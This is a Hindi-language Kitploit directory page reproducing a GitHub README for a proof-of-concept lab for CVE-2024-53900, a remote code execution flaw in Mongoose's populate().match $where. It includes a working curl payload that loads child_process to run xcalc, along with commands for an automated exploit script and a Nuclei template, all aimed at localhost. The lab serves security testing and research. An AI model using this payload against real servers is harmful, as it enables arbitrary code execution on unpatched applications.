Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-53900 — CVE-2024-53900 के लिए प्रतिलिपि करने योग्य वातावरण और PoC, जो Mongoose में populate().match $where के माध्यम से एक गंभीर RCE है। इसमें स्वचालित शोषण स्क्रिप्ट और सुरक्षा परीक्षण के लिए Nuclei टेम्पलेट शामिल है। | Kitploit
उपकरण/GitHubGitHub/www-spam/cve-2024-53900
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubwww-spam/cve-2024-53900

CVE-2024-53900

CVE-2024-53900 के लिए प्रतिलिपि करने योग्य वातावरण और PoC, जो Mongoose में populate().match $where के माध्यम से एक गंभीर RCE है। इसमें स्वचालित शोषण स्क्रिप्ट और सुरक्षा परीक्षण के लिए Nuclei टेम्पलेट शामिल है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-53900 - Mongoose populate().match $where RCE

यह रिपॉजिटरी CVE-2024-53900 के लिए एक पुनरुत्पादक संवेदनशील वातावरण और PoC प्रदान करता है, जो Mongoose < 8.8.3 में एक महत्वपूर्ण रिमोट कोड निष्पादन (RCE) भेद्यता है।


📌 भेद्यता विवरण

  • CVE: CVE-2024-53900
  • प्रभावित: Mongoose < 8.8.3
  • गंभीरता: गंभीर (CVSS 9.1)
  • वेक्टर: populate().match $where के साथ संयुक्त
  • प्रभाव: Node.js संदर्भ में मनमाना JavaScript निष्पादन (RCE)

संदर्भ:

  • GitHub Advisory
  • सुधार कमिट

🛠️ सेटअप निर्देश

1. रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/www-spam/CVE-2024-53900.git
cd CVE-2024-53900

2. वातावरण शुरू करें (Docker Compose)

root@kitploit:~
docker-compose up -d

📌 GUI PoC (कैलकुलेटर)

डिफ़ॉल्ट रूप से, संवेदनशील Node.js ऐप Docker के अंदर चलता है।
हालांकि, GUI एप्लिकेशन (जैसे xcalc या gnome-calculator) कंटेनर के अंदर लॉन्च नहीं होंगे।

👉 यदि आप कैलकुलेटर विंडो लॉन्च करके RCE प्रदर्शित करना चाहते हैं:

  1. MongoDB को Docker में चलाएं (DB बैकएंड के रूप में)

    root@kitploit:~
    docker run -d --name mongo -p 27017:27017 mongo:6
    
  2. संवेदनशील Node.js ऐप को स्थानीय रूप से चलाएं

root@kitploit:~
   cd ~/cve-2024/app
   npm install
   node server.js
  • MongoDB पोर्ट 27017 पर चलता है
  • संवेदनशील Node.js ऐप पोर्ट 5000 पर चलता है

📂 निर्देशिका संरचना

root@kitploit:~
/home/kali/cve-2024/
├── docker-compose.yml     # Environment setup
├── exploit.py             # Automated exploit script
├── CVE-2024-53900.yaml    # Nuclei template
├── README.md              # Documentation
├── app/                   # Vulnerable Node.js app
│   ├── Dockerfile
│   ├── package.json
│   ├── server.js
│   ├── models.js
│   └── views/
└── data/                  # MongoDB volume

🚀 शोषण

मैन्युअल परीक्षण

root@kitploit:~
curl "http://localhost:5000/book/{OBJECT_ID}/detail?view[path]=author&view[match][$where]=global.process.mainModule.constructor._load('child_process').exec('xcalc')"

स्वचालित PoC

root@kitploit:~
python3 exploit.py --url http://localhost:5000

Nuclei के साथ

root@kitploit:~
nuclei \ -u http://localhost:5000/book/{{OBJECT_ID}/detail \ -t ~/.local/nuclei-templates/CVE-2024-53900.yaml \ -var pfield=author
image

🔒 सुरक्षा नोट्स

  • केवल अनुसंधान और परीक्षण के लिए (उत्पादन के लिए नहीं)।
  • पेलोड सुरक्षित संचालन तक सीमित (जैसे, फ़ाइल निर्माण)।
  • Docker का उपयोग करके पूरी तरह से पृथक।

✅ परीक्षण किया गया वातावरण

  • OS: Kali Linux
  • MongoDB: mongo:6
  • Node.js: 18
  • Mongoose: 8.5.0 (संवेदनशील)
  • Express: 4.18.2

📸 डेमो

Image
टूल डाउनलोड करें